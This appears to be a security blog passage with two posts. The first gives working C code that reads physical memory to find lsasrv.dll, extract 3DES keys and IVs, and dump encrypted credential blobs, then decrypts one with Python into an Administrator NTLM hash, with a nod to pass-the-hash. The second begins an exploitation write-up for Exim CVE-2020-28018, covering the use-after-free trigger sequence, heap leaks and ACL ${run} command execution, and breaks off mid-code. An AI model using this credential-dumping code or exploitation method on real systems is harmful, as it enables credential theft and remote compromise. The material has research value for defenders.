//Get the pointer to Subsection (offset 0x48 of __mmvad)
reader.QuadPart = v2p(currentNode + 0x48);
subsection = readPhysMemPointer(reader);
if (subsection != 0 && subsection != 0xffffffffffffffff) {
//Get the pointer to ControlArea (offset 0 of _SUBSECTION)
reader.QuadPart = v2p(subsection);
control_area = readPhysMemPointer(reader);
if (control_area != 0 && control_area != 0xffffffffffffffff) {
//Get the pointer to FileObject (offset 0x40 of _CONTROL_AREA)
reader.QuadPart = v2p(control_area + 0x40);
fileobject = readPhysMemPointer(reader);
if (fileobject != 0 && fileobject != 0xffffffffffffffff) {
// It is an _EX_FAST_REF, so we need to mask the last byte
fileobject = fileobject & 0xfffffffffffffff0;
//Get the pointer to path length (offset 0x58 of _FILE_OBJECT is _UNICODE_STRING, the len plus null bytes is at +0x2)
reader.QuadPart = v2p(fileobject + 0x58 + 0x2);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &pathLen, 2, &bytes_read, NULL);
//Get the pointer to the path name (offset 0x58 of _FILE_OBJECT is _UNICODE_STRING, the pointer to the buffer is +0x08)
reader.QuadPart = v2p(fileobject + 0x58 + 0x8);
filename = readPhysMemPointer(reader);
//Save the path name
path = (LPWSTR)malloc(pathLen * sizeof(wchar_t));
reader.QuadPart = v2p(filename);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, path, pathLen * 2, &bytes_read, NULL);
}
}
}
/*printf("[0x%08llx]\n", currentNode);
printf("[!] Subsection 0x%08llx\n", subsection);
printf("[!] ControlArea 0x%08llx\n", control_area);
printf("[!] FileObject 0x%08llx\n", fileobject);
printf("[!] PathLen %d\n", pathLen);
printf("[!] Buffer with path name 0x%08llx\n", filename);
printf("[!] Path name: %S\n", path);
*/
// Save the info in our list
vadList[count - 1].id = count - 1;
vadList[count - 1].vaddress = currentNode;
vadList[count - 1].start = start;
vadList[count - 1].end = end;
vadList[count - 1].size = end - start;
memset(vadList[count - 1].image, 0, MAX_PATH);
if (path != NULL) {
wcstombs(vadList[count - 1].image, path, MAX_PATH);
free(path);
}
count++;
cursor++;
}
//Just print the VAD list
printf("\t\t===================[VAD info]===================\n");
for (int i = 0; i < VadCount; i++) {
printf("[%lld] (0x%08llx) [0x%08llx-0x%08llx] (%lld bytes)\n", vadList[i].id, vadList[i].vaddress, vadList[i].start, vadList[i].end, vadList[i].size);
if (vadList[i].image[0] != 0) {
printf(" |\n +---->> %s\n", vadList[i].image);
}
}
printf("\t\t================================================\n");
for (int i = 0; i < VadCount; i++) {
if (!strcmp(vadList[i].image, "\\Windows\\System32\\lsasrv.dll")) { // Is this our target?
printf("[!] LsaSrv.dll found! [0x%08llx-0x%08llx] (%lld bytes)\n", vadList[i].start, vadList[i].end, vadList[i].size);
// TODO lootLsaSrv(vadList[i].start, vadList[i].end, vadList[i].size);
break;
}
}
free(vadList);
free(queue);
return;
}
This looks like…
(...)
[161] (0xffffa48baf677ba0) [0x7ff8122b0000-0x7ff8122e0000] (196608 bytes)
|
+---->> \Windows\System32\CertPolEng.dll
[162] (0xffffa48bb1f640a0) [0x7ff8183e0000-0x7ff818422000] (270336 bytes)
|
+---->> \Windows\System32\ngcpopkeysrv.dll
[163] (0xffffa48bb1f63ce0) [0x7ff83df10000-0x7ff83df2a000] (106496 bytes)
|
+---->> \Windows\System32\tbs.dll
[164] (0xffffa48bb1f66a80) [0x7ff83e270000-0x7ff83e2e3000] (471040 bytes)
|
+---->> \Windows\System32\cryptngc.dll
================================================
[!] LsaSrv.dll found! [0x7ff845130000-0x7ff8452ce000] (1695744 bytes)
To recap at this point we:
This time we are only interested in retrieving NTLM hashes, so we are going to implement something like the sekurlsa::msv
from Mimikatz as PoC (once we have located the process memory, and its modules, it is trivial to imitate any functionatility from Mimikatz so I picked the quickier to implement as PoC).
This is well explained in the article “Uncovering Mimikatz ‘msv’ and collecting credentials through PyKD” from Matteo Malvica, so it is redundant to explain it again here… but in essence we are going to search for signatures inside lsasrv.dll and then retrieve the info needed to locate the LogonSessionList
struct and the crypto keys/IVs needed. Also another good related article to read is “Exploring Mimikatz - Part 1 - WDigest” by @xpn.
As I am imitating the post from Matteo Malvica, I am going to retrieve only the cryptoblob encrypted with Triple-DES. Here is our shitty code:
void lootLsaSrv(ULONGLONG start, ULONGLONG end, ULONGLONG size) {
LARGE_INTEGER reader;
DWORD bytes_read = 0;
LPSTR lsasrv = NULL;
ULONGLONG cursor = 0;
ULONGLONG lsasrv_size = 0;
ULONGLONG original = 0;
BOOL result;
ULONGLONG LogonSessionListCount = 0;
ULONGLONG LogonSessionList = 0;
ULONGLONG LogonSessionList_offset = 0;
ULONGLONG LogonSessionListCount_offset = 0;
ULONGLONG iv_offset = 0;
ULONGLONG hDes_offset = 0;
ULONGLONG DES_pointer = 0;
unsigned char* iv_vector = NULL;
unsigned char* DES_key = NULL;
KIWI_BCRYPT_HANDLE_KEY h3DesKey;
KIWI_BCRYPT_KEY81 extracted3DesKey;
LSAINITIALIZE_NEEDLE LsaInitialize_needle = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x44, 0x8b, 0x4d, 0xd8, 0x48, 0x8d, 0x15 };
LOGONSESSIONLIST_NEEDLE LogonSessionList_needle = { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 };
PBYTE LsaInitialize_needle_buffer = NULL;
PBYTE needle_buffer = NULL;
int offset_LsaInitialize_needle = 0;
int offset_LogonSessionList_needle = 0;
ULONGLONG currentElem = 0;
original = start;
/* Save the whole region in a buffer */
lsasrv = (LPSTR)malloc(size);
while (start < end) {
DWORD bytes_read = 0;
DWORD bytes_written = 0;
CHAR tmp = NULL;
reader.QuadPart = v2p(start);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &tmp, 1, &bytes_read, NULL);
lsasrv[cursor] = tmp;
cursor++;
start = original + cursor;
}
lsasrv_size = cursor;
// Use mimikatz signatures to find the IV/keys
printf("\t\t===================[Crypto info]===================\n");
LsaInitialize_needle_buffer = (PBYTE)malloc(sizeof(LSAINITIALIZE_NEEDLE));
memcpy(LsaInitialize_needle_buffer, &LsaInitialize_needle, sizeof(LSAINITIALIZE_NEEDLE));
offset_LsaInitialize_needle = memmem((PBYTE)lsasrv, lsasrv_size, LsaInitialize_needle_buffer, sizeof(LSAINITIALIZE_NEEDLE));
printf("[*] Offset for InitializationVector/h3DesKey/hAesKey is %d\n", offset_LsaInitialize_needle);
memcpy(&iv_offset, lsasrv + offset_LsaInitialize_needle + 0x43, 4); //IV offset
printf("[*] IV Vector relative offset: 0x%08llx\n", iv_offset);
iv_vector = (unsigned char*)malloc(16);
memcpy(iv_vector, lsasrv + offset_LsaInitialize_needle + 0x43 + 4 + iv_offset, 16);
printf("\t\t[/!\\] IV Vector: ");
for (int i = 0; i < 16; i++) {
printf("%02x", iv_vector[i]);
}
printf(" [/!\\]\n");
free(iv_vector);
memcpy(&hDes_offset, lsasrv + offset_LsaInitialize_needle - 0x59, 4); //DES KEY offset
printf("[*] 3DES Handle Key relative offset: 0x%08llx\n", hDes_offset);
reader.QuadPart = v2p(original + offset_LsaInitialize_needle - 0x59 + 4 + hDes_offset);
DES_pointer = readPhysMemPointer(reader);
printf("[*] 3DES Handle Key pointer: 0x%08llx\n", DES_pointer);
reader.QuadPart = v2p(DES_pointer);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &h3DesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY), &bytes_read, NULL);
reader.QuadPart = v2p((ULONGLONG)h3DesKey.key);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &extracted3DesKey, sizeof(KIWI_BCRYPT_KEY81), &bytes_read, NULL);
DES_key = (unsigned char*)malloc(extracted3DesKey.hardkey.cbSecret);
memcpy(DES_key, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret);
printf("\t\t[/!\\] 3DES Key: ");
for (int i = 0; i < extracted3DesKey.hardkey.cbSecret; i++) {
printf("%02x", DES_key[i]);
}
printf(" [/!\\]\n");
free(DES_key);
printf("\t\t================================================\n");
needle_buffer = (PBYTE)malloc(sizeof(LOGONSESSIONLIST_NEEDLE));
memcpy(needle_buffer, &LogonSessionList_needle, sizeof(LOGONSESSIONLIST_NEEDLE));
offset_LogonSessionList_needle = memmem((PBYTE)lsasrv, lsasrv_size, needle_buffer, sizeof(LOGONSESSIONLIST_NEEDLE));
memcpy(&LogonSessionList_offset, lsasrv + offset_LogonSessionList_needle + 0x17, 4);
printf("[*] LogonSessionList Relative Offset: 0x%08llx\n", LogonSessionList_offset);
LogonSessionList = original + offset_LogonSessionList_needle + 0x17 + 4 + LogonSessionList_offset;
printf("[*] LogonSessionList: 0x%08llx\n", LogonSessionList);
reader.QuadPart = v2p(LogonSessionList);
printf("\t\t===================[LogonSessionList]===================");
while (currentElem != LogonSessionList) {
if (currentElem == 0) {
currentElem = LogonSessionList;
}
reader.QuadPart = v2p(currentElem);
currentElem = readPhysMemPointer(reader);
//printf("Element at: 0x%08llx\n", currentElem);
USHORT length = 0;
LPWSTR username = NULL;
ULONGLONG username_pointer = 0;
reader.QuadPart = v2p(currentElem + 0x90); //UNICODE_STRING = USHORT LENGHT USHORT MAXLENGTH LPWSTR BUFFER
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &length, 2, &bytes_read, NULL); //Read Lenght Field
username = (LPWSTR)malloc(length + 2);
memset(username, 0, length + 2);
reader.QuadPart = v2p(currentElem + 0x98);
username_pointer = readPhysMemPointer(reader); //Read LPWSTR
reader.QuadPart = v2p(username_pointer);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, username, length, &bytes_read, NULL); //Read string at LPWSTR
wprintf(L"\n[+] Username: %s \n", username);
free(username);
ULONGLONG credentials_pointer = 0;
reader.QuadPart = v2p(currentElem + 0x108);
credentials_pointer = readPhysMemPointer(reader);
if (credentials_pointer == 0) {
printf("[+] Cryptoblob: (empty)\n");
continue;
}
printf("[*] Credentials Pointer: 0x%08llx\n", credentials_pointer);
ULONGLONG primaryCredentials_pointer = 0;
reader.QuadPart = v2p(credentials_pointer + 0x10);
primaryCredentials_pointer = readPhysMemPointer(reader);
printf("[*] Primary credentials Pointer: 0x%08llx\n", primaryCredentials_pointer);
USHORT cryptoblob_size = 0;
reader.QuadPart = v2p(primaryCredentials_pointer + 0x18);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, &cryptoblob_size, 4, &bytes_read, NULL);
if (cryptoblob_size % 8 != 0) {
printf("[*] Cryptoblob size: (not compatible with 3DEs, skipping...)\n");
continue;
}
printf("[*] Cryptoblob size: 0x%x\n", cryptoblob_size);
ULONGLONG cryptoblob_pointer = 0;
reader.QuadPart = v2p(primaryCredentials_pointer + 0x20);
cryptoblob_pointer = readPhysMemPointer(reader);
//printf("Cryptoblob pointer: 0x%08llx\n", cryptoblob_pointer);
unsigned char* cryptoblob = (unsigned char*)malloc(cryptoblob_size);
reader.QuadPart = v2p(cryptoblob_pointer);
result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN);
result = ReadFile(pmem_fd, cryptoblob, cryptoblob_size, &bytes_read, NULL);
printf("[+] Cryptoblob:\n");
for (int i = 0; i < cryptoblob_size; i++) {
printf("%02x", cryptoblob[i]);
}
printf("\n");
}
printf("\t\t================================================\n");
free(needle_buffer);
free(lsasrv);
}
If you wonder why I am not calling windows API to decrypt the info… It was 4:00 AM when we wrote this :(. Anyway, fire in the hole!
[!] LsaSrv.dll found! [0x7ff845130000-0x7ff8452ce000] (1695744 bytes)
===================[Crypto info]===================
[*] Offset for InitializationVector/h3DesKey/hAesKey is 305033
[*] IV Vector relative offset: 0x0013be98
[/!\] IV Vector: d2e23014c6608529132d0f21144ee0df [/!\]
[*] 3DES Handle Key relative offset: 0x0013bf4c
[*] 3DES Handle Key pointer: 0x1d4d3610000
[/!\] 3DES Key: 46bca8b85491846f5c7fb42700287d0437c49c15e7b76280 [/!\]
================================================
[*] LogonSessionList Relative Offset: 0x0012b0f1
[*] LogonSessionList: 0x7ff8452b52a0
===================[LogonSessionList]===================
[+] Username: Administrador
[*] Credentials Pointer: 0x1d4d3ba96c0
[*] Primary credentials Pointer: 0x1d4d3ae49f0
[*] Cryptoblob size: 0x1b0
[+] Cryptoblob:
f0e368d8302af9bbcd247687552e8207d766e674c99a61907e78a173d5e4d475df165ec1fcba3b5d3463f8bd7ce5fa6457d043147dcf26a6e03ec12d1216d57953a7f4cbdcaeec2c6a27787c332db706a5287a77957d09d546590d7f32a117f69d983290c01b1ad83cf66916ee76314c17605518a17d7ea9db2de530b1298e5178fcc638e1ae106542dcb46e37a09943dd10e3e2f15a99b93989361aa3a6e6ed8e98aab5578712bcf0f9e5a5372542f61a9032bf5d110278253c4f602107a02bf2cfe07fae7f81a4dee6440a596278e7c06eee06de5aa7f705bd6132dea0327ad869eca5da1538e098edfefcd050dd6e36a0a3196cdf5ee6786d0b62a3d526981f6c4fc503d43238887cf6f3c51cca01b912194242d7e5a76522aaf791c467ea6035a06219ea2aafc2860e6db56ddb77936871316e3f18fd9b1425f948c925171829e460cf7c31f9a0396705bcb1bfd0055b25de160cf816472180270f36e9224868d1377349f7bb001e7edfe52dbd1915a70fb686f850086732c57ba26423f7a3691ddb9b23b5f2166a56ee82d30571ffb79b222e707f6dc2cc5f986723d99229345b2d0b97371abb1573f59efecd6a
Let’s decrypt with python (yeah, we know, we are the worst :()
>>> from pyDes import *
>>> k = triple_des("46bca8b85491846f5c7fb42700287d0437c49c15e7b76280".decode("hex"), CBC, "\x00\x0d\x56\x99\x63\x93\x95\xd0")
>>> k.decrypt("f0e368d8302af9bbcd247687552e8207d766e674c99a61907e78a173d5e4d475df165ec1fcba3b5d3463f8bd7ce5fa6457d043147dcf26a6e03ec12d1216d57953a7f4cbdcaeec2c6a27787c332db706a5287a77957d09d546590d7f32a117f69d983290c01b1ad83cf66916ee76314c17605518a17d7ea9db2de530b1298e5178fcc638e1ae106542dcb46e37a09943dd10e3e2f15a99b93989361aa3a6e6ed8e98aab5578712bcf0f9e5a5372542f61a9032bf5d110278253c4f602107a02bf2cfe07fae7f81a4dee6440a596278e7c06eee06de5aa7f705bd6132dea0327ad869eca5da1538e098edfefcd050dd6e36a0a3196cdf5ee6786d0b62a3d526981f6c4fc503d43238887cf6f3c51cca01b912194242d7e5a76522aaf791c467ea6035a06219ea2aafc2860e6db56ddb77936871316e3f18fd9b1425f948c925171829e460cf7c31f9a0396705bcb1bfd0055b25de160cf816472180270f36e9224868d1377349f7bb001e7edfe52dbd1915a70fb686f850086732c57ba26423f7a3691ddb9b23b5f2166a56ee82d30571ffb79b222e707f6dc2cc5f986723d99229345b2d0b97371abb1573f59efecd6a".decode("hex"))[74:90].encode("hex")
'191d643eca7a6b94a3b6df1469ba2846'
We can check that indeed the Administrador’s NTLM hash is 191d643eca7a6b94a3b6df1469ba2846
:
C:\Windows\system32>C:\Users\ortiga.japonesa\Downloads\mimikatz-master\mimikatz-master\x64\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 May 8 2021 00:30:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # sekurlsa::msv
[!] LogonSessionListCount: 0x7ff8452b4be0
[!] LogonSessionList: 0x7ff8452b52a0
[!] Data Address: 0x1d4d3bfb5c0
Authentication Id : 0 ; 120327884 (00000000:072c0ecc)
Session : CachedInteractive from 1
User Name : Administrador
Domain : ACUARIO
Logon Server : WIN-UQ1FE7E6SES
Logon Time : 08/05/2021 0:44:32
SID : S-1-5-21-3039666266-3544201716-3988606543-500
msv :
[00000003] Primary
* Username : Administrador
* Domain : ACUARIO
* NTLM : 191d643eca7a6b94a3b6df1469ba2846
* SHA1 : 5f041d6e1d3d0b3f59d85fa7ff60a14ae1a5963d
* DPAPI : b4772e37b9a6a10785ea20641c59e5b2
MMmm… that PtH smell…
Playing with Windows Internals and reading Mimikatz code is a nice exercise to learn and practice new things. As we said at the begin, probably this approach is not the best (our knowledge on this topic is limited), so if you spot errors/misconceptions/typos please contact us so we can fix it.
The code can be found in our repo as SnoopyOwl.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about building a PoC for one of the vulnerabilities published by Qualys in Exim. Please, take a seat and listen to the story.
Qualys recently released an advisory named “21Nails” with 21 vulnerabilities discovered in Exim, some leading to LPE and RCE.
This post will analyze one of those vulnerabilities with CVE ID: CVE-2020-28018.
The vulnerability is a Use-After-Free (UAF) vulnerability on tls-openssl.c
, that leads to Remote Code Execution.
This vulnerability is really powerful as it allows an attacker to craft important primitives to bypass memory protections like PIE or ASLR.
The primitives that this vulnerability can achieve are the following:
As you can see, those primitives are just what a remote attacker needs to bypass security protections.
First for this vulnerability to be triggered and exploited some requirements need to be met:
X_PIPE_CONNECT
should be disabledFirst, to understand why does this vulnerability exists and how to exploit it, we need to understand the behaviour of the Exim Pool Allocator and the growable strings Exim uses.
Exim pool allocator has different pools:
POOL_PERM
: Allocations that are not released until the process finishesPOOL_MAIN
: Allocations that can be freedPOOL_SEARCH
: Lookup storageA pool is a linked list of storeblock
structures starting from the chainbase
.
typedef struct storeblock {
struct storeblock *next;
size_t length;
} storeblock;
We can see it contains two entries:
next
: Pointer to the next block within the linked list.length
: Length of current block.void *
store_get_3(int size, const char *filename, int linenumber)
{
if (size % alignment != 0) size += alignment - (size % alignment);
if (size > yield_length[store_pool])
{
int length = (size <= STORE_BLOCK_SIZE)? STORE_BLOCK_SIZE : size;
int mlength = length + ALIGNED_SIZEOF_STOREBLOCK;
storeblock * newblock = NULL;
if ( (newblock = current_block[store_pool])
&& (newblock = newblock->next)
&& newblock->length < length
)
{
/* Give up on this block, because it's too small */
store_free(newblock);
newblock = NULL;
}
if (!newblock)
{
pool_malloc += mlength; /* Used in pools */
nonpool_malloc -= mlength; /* Exclude from overall total */
newblock = store_malloc(mlength);
newblock->next = NULL;
newblock->length = length;
if (!chainbase[store_pool])
chainbase[store_pool] = newblock;
else
current_block[store_pool]->next = newblock;
}
current_block[store_pool] = newblock;
yield_length[store_pool] = newblock->length;
next_yield[store_pool] =
(void *)(CS current_block[store_pool] + ALIGNED_SIZEOF_STOREBLOCK);
(void) VALGRIND_MAKE_MEM_NOACCESS(next_yield[store_pool], yield_length[store_pool]);
}
store_last_get[store_pool] = next_yield[store_pool];
...
next_yield[store_pool] = (void *)(CS next_yield[store_pool] + size);
yield_length[store_pool] -= size;
return store_last_get[store_pool];
}
When store_get()
is called it first checks if there is enough space on the current block to satisfy the request.
If there is space, the yield
pointer is updated and a pointer to the memory is returned to the caller funcion.
If there is no space it checks if there is a free block, and then at the last try, call malloc()
to satisfy the request (the requirement is a minimum of STORE_BLOCK_SIZE
, if less than that, it will be used as the size for the allocation).
Finally the new block is added to the pool linked list.
void
store_reset_3(void *ptr, const char *filename, int linenumber)
{
storeblock * bb;
storeblock * b = current_block[store_pool];
char * bc = CS b + ALIGNED_SIZEOF_STOREBLOCK;
int newlength;
store_last_get[store_pool] = NULL;
if (CS ptr < bc || CS ptr > bc + b->length)
{
for (b = chainbase[store_pool]; b; b = b->next)
{
bc = CS b + ALIGNED_SIZEOF_STOREBLOCK;
if (CS ptr >= bc && CS ptr <= bc + b->length) break;
}
if (!b)
log_write(0, LOG_MAIN|LOG_PANIC_DIE, "internal error: store_reset(%p) "
"failed: pool=%d %-14s %4d", ptr, store_pool, filename, linenumber);
}
newlength = bc + b->length - CS ptr;
...
(void) VALGRIND_MAKE_MEM_NOACCESS(ptr, newlength);
yield_length[store_pool] = newlength - (newlength % alignment);
next_yield[store_pool] = CS ptr + (newlength % alignment);
current_block[store_pool] = b;
if (yield_length[store_pool] < STOREPOOL_MIN_SIZE &&
b->next &&
b->next->length == STORE_BLOCK_SIZE)
{
b = b->next;
...
(void) VALGRIND_MAKE_MEM_NOACCESS(CS b + ALIGNED_SIZEOF_STOREBLOCK,
b->length - ALIGNED_SIZEOF_STOREBLOCK);
}
bb = b->next;
b->next = NULL;
while ((b = bb))
{
...
bb = bb->next;
pool_malloc -= b->length + ALIGNED_SIZEOF_STOREBLOCK;
store_free_3(b, filename, linenumber);
}
...
}
Store reset performs a reset / free given a reset point. All subsequent blocks to the block that contains the reset_point
will be freed. And finally the yield
pointer will be restored within the same block.
BOOL
store_extend_3(void *ptr, int oldsize, int newsize, const char *filename,
int linenumber)
{
int inc = newsize - oldsize;
int rounded_oldsize = oldsize;
if (rounded_oldsize % alignment != 0)
rounded_oldsize += alignment - (rounded_oldsize % alignment);
if (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||
inc > yield_length[store_pool] + rounded_oldsize - oldsize)
return FALSE;
...
if (newsize % alignment != 0) newsize += alignment - (newsize % alignment);
next_yield[store_pool] = CS ptr + newsize;
yield_length[store_pool] -= newsize - rounded_oldsize;
(void) VALGRIND_MAKE_MEM_UNDEFINED(ptr + oldsize, inc);
return TRUE;
}
As we will see later on gstrings
, this function tries to extend memory in the same block if there space is available.
Exim uses something called gstrings
as a growable string implementation.
This is the structure that defines it:
typedef struct gstring {
int size;
int ptr;
uschar *s;
} gstring;
size
: string buffer size.ptr
: offset to the last character on the string buffer.uschar *s
: defines a pointer to the string buffer.When we want to get a string we can use string_get()
:
gstring *
string_get(unsigned size)
{
gstring * g = store_get(sizeof(gstring) + size);
g->size = size;
g->ptr = 0;
g->s = US(g + 1);
return g;
}
It uses store_get()
to allocate a buffer.
At gstring
initialization, the string buffer is right after the struct.
When we want to enter data into the growable string:
gstring *
string_catn(gstring * g, const uschar *s, int count)
{
int p;
if (!g)
{
unsigned inc = count < 4096 ? 127 : 1023;
unsigned size = ((count + inc) & ~inc) + 1;
g = string_get(size);
}
p = g->ptr;
if (p + count >= g->size)
gstring_grow(g, p, count);
memcpy(g->s + p, s, count);
g->ptr = p + count;
return g;
}
string_catn()
checks first if there is enough size, if not, calls gstring_grow()
.
static void
gstring_grow(gstring * g, int p, int count)
{
int oldsize = g->size;
unsigned inc = oldsize < 4096 ? 127 : 1023;
g->size = ((p + count + inc) & ~inc) + 1;
if (!store_extend(g->s, oldsize, g->size))
g->s = store_newblock(g->s, g->size, p);
}
It first tries to extend the memory chunk within the same pool block. If failed, then a new block is allocated and the g->s
pointer is replaced with the new buffer.
Access Control Lists (ACLs) is a type of configuration that allows you to change the behaviour of a server when receiving SMTP commands.
ACLs have been a good way to achieve code execution when exploiting Exim vulnerabilities since a long time.
There is an specific ACL name called run
which allows you to run a command.
Sample: ${run{ls -la}}
This specific ACL is the one used when exploiting this vulnerability to execute code remotely.
Understanding now how growable strings, the Exim pool allocator and ACL’s work, let’s analyze the root cause of this vulnerability.
In tls-openssl.c
, on tls_write()
:
int
tls_write(void * ct_ctx, const uschar *buff, size_t len, BOOL more)
{
int outbytes, error, left;
SSL * ssl = ct_ctx ? ((exim_openssl_client_tls_ctx *)ct_ctx)->ssl : server_ssl;
static gstring * corked = NULL;
DEBUG(D_tls) debug_printf("%s(%p, %lu%s)\n", __FUNCTION__,
buff, (unsigned long)len, more ? ", more" : "");
/* Lacking a CORK or MSG_MORE facility (such as GnuTLS has) we copy data when
"more" is notified. This hack is only ok if small amounts are involved AND only
one stream does it, in one context (i.e. no store reset). Currently it is used
for the responses to the received SMTP MAIL , RCPT, DATA sequence, only. */
/*XXX + if PIPE_COMMAND, banner & ehlo-resp for smmtp-on-connect. Suspect there's
a store reset there. */
if (!ct_ctx && (more || corked))
{
#ifdef EXPERIMENTAL_PIPE_CONNECT
int save_pool = store_pool;
store_pool = POOL_PERM;
#endif
corked = string_catn(corked, buff, len);
#ifdef EXPERIMENTAL_PIPE_CONNECT
store_pool = save_pool;
#endif
if (more)
return len;
buff = CUS corked->s;
len = corked->ptr;
corked = NULL;
}
for (left = len; left > 0;)
{
DEBUG(D_tls) debug_printf("SSL_write(%p, %p, %d)\n", ssl, buff, left);
outbytes = SSL_write(ssl, CS buff, left);
error = SSL_get_error(ssl, outbytes);
DEBUG(D_tls) debug_printf("outbytes=%d error=%d\n", outbytes, error);
switch (error)
{
case SSL_ERROR_SSL:
ERR_error_string_n(ERR_get_error(), ssl_errstring, sizeof(ssl_errstring));
log_write(0, LOG_MAIN, "TLS error (SSL_write): %s", ssl_errstring);
return -1;
case SSL_ERROR_NONE:
left -= outbytes;
buff += outbytes;
break;
case SSL_ERROR_ZERO_RETURN:
log_write(0, LOG_MAIN, "SSL channel closed on write");
return -1;
case SSL_ERROR_SYSCALL:
log_write(0, LOG_MAIN, "SSL_write: (from %s) syscall: %s",
sender_fullhost ? sender_fullhost : US"<unknown>",
strerror(errno));
return -1;
default:
log_write(0, LOG_MAIN, "SSL_write error %d", error);
return -1;
}
}
return len;
}
This function is the one that send responses to the client when a TLS session is active.
corked
is an static
pointer, it can be used within different calls.
more
with type BOOL
is a way to specify if there is more data to buffer or we can return the data to the user.
In case more data needs to be copied, len
is returned. Else, corked
is NULLed out and the corked->s
contents is returned to the client.
This means that we might be able to trigger a Use-After-Free condition in case corked
somehow does not get NULLed, and after a call to smtp_reset
is performed, the content pointed to by corked
will be freed.
If reaching tls_write()
again, we will use the buffer after free.
How can we put the server in that situation?
First we initialize a connection to the server, and send EHLO
and STARTTLS
to start a new TLS Session so we can enter tls_write()
on responses.
If we send either RCPT TO
or MAIL TO
pipelined with a command like NOOP
. And we send just a half of the NOOP
(NO
), and then we close the TLS Session to get back to plaintext to send the other half (OP\n
), we will be returning to plaintext and as more = 1
the corked
pointer won’t be NULLed.
Now sending a command like EHLO
will end up calling smtp_reset()
, which will free all the subsequent heap chunks, and retore the yield
pointer to reset_point
.
On the whole exploitation process we are dealing mostly with the POOL_MAIN
pool.
We have a static variable containing a pointer to the middle of a buffer that has been freed. We need to use it to trigger a UAF.
To use it, we need to return to a TLS connection, so we can use tls_write()
again.
We send STARTTLS
to start a new TLS Session and finally send any command. When the server crafts the response on tls_write()
, corked
will be used after free.
When I first triggered the bug, a function from OpenSSL lib used my freed buffer and entered binary data, resulting on a SIGSEGV interruption due to an invalid memory address for corked->s
:
gef➤ p *corked
$1 = {
size = 0x54595c9c,
ptr = 0xa7e800ba,
s = 0x7e35043433160bd3 <error: Cannot access memory at address 0x7e35043433160bd3>
}
gef➤ p corked
$2 = (gstring *) 0x555ad3be1b58
gef➤
Most memory corruption exploits will need nowadays a memory leak to succeed and bypass mitigations like ASLR, PIE and many more.
As mentioned, this Use-After-Free itself allows a remote attacker to retrieve heap pointers.
As the buffer is freed, other functions will start using it, like functions that write heap pointers to the heap.
On responses, NULL bytes are allowed when on a TLS Session. We just need the heap addresses to be leaked be entered in a range of memory from corked->s
to corked->s + corked->ptr
.
If the address is on that range, it will be returned to the client.
How can we make heap addresses written in that range?
Apart from doing some tests and debugging to see where to move our buffer and how, an interesting trick is pipelining RCPT TO
commands together to increase the response buffer string. It will force string_catn()
to call gstring_grow()
, which will allocate the string buffer somewhere else.
This will help us to overwrite the string buffer but not the gstring
struct itself.
Once we have a memory leak, we might start a search of the exim ACL’s, once we identify the address where the ACL is located we can write to it to finally achieve code execution.
To do so, we need to craft somehow an arbitrary read primitive that let us read memory from heap.
Thanks to this Use-After-Free, grooming the heap, we can overwrite the gstring
struct, this would allow us to control:
corked->size
: size of string buffercorked->ptr
: offset to last byte writtencorked->s
: pointer to string bufferHaving this, on next tls_write()
, arbitrary number of bytes from an arbitrary location will be sent to us when trying to access corked->s
.
What about NULLs? They are strings right?
Nope! The responses are returned to the client through SSL_write()
, so no problems with NULLs, the limit is corked->ptr
which is controlled :).
With this technique we can read any memory we want from heap, so we can iterate over memory blocks until finding the configuration via specific query to search for.
How do I overwrite gstring
struct?
First we need to align the heap in such way that we can successfully reuse the target chunk.
In smtp_setup_msg()
we depend on the initial reset_point
.
To avoid this…reading the handle_smtp_call()
we can see there is a way to increase reset_point
as initial value on smtp_setup_msg()
.
if (!smtp_start_session())
{
mac_smtp_fflush();
search_tidyup();
_exit(EXIT_SUCCESS);
}
for (;;)
{
int rc;
message_id[0] = 0; /* Clear out any previous message_id */
reset_point = store_get(0); /* Save current store high water point */
DEBUG(D_any)
debug_printf("Process %d is ready for new message\n", (int)getpid());
/* Smtp_setup_msg() returns 0 on QUIT or if the call is from an
unacceptable host or if an ACL "drop" command was triggered, -1 on
connection lost, and +1 on validly reaching DATA. Receive_msg() almost
always returns TRUE when smtp_input is true; just retry if no message was
accepted (can happen for invalid message parameters). However, it can yield
FALSE if the connection was forcibly dropped by the DATA ACL. */
if ((rc = smtp_setup_msg()) > 0)
{
BOOL ok = receive_msg(FALSE);
search_tidyup(); /* Close cached databases */
if (!ok) /* Connection was dropped */
{
cancel_cutthrough_connection(TRUE, US"receive dropped");
mac_smtp_fflush();
smtp_log_no_mail(); /* Log no mail if configured */
_exit(EXIT_SUCCESS);
}
if (message_id[0] == 0) continue; /* No message was accepted */
}
else
{
if (smtp_out)
{
int i, fd = fileno(smtp_in);
uschar buf[128];
mac_smtp_fflush();
/* drain socket, for clean TCP FINs */
if (fcntl(fd, F_SETFL, O_NONBLOCK) == 0)
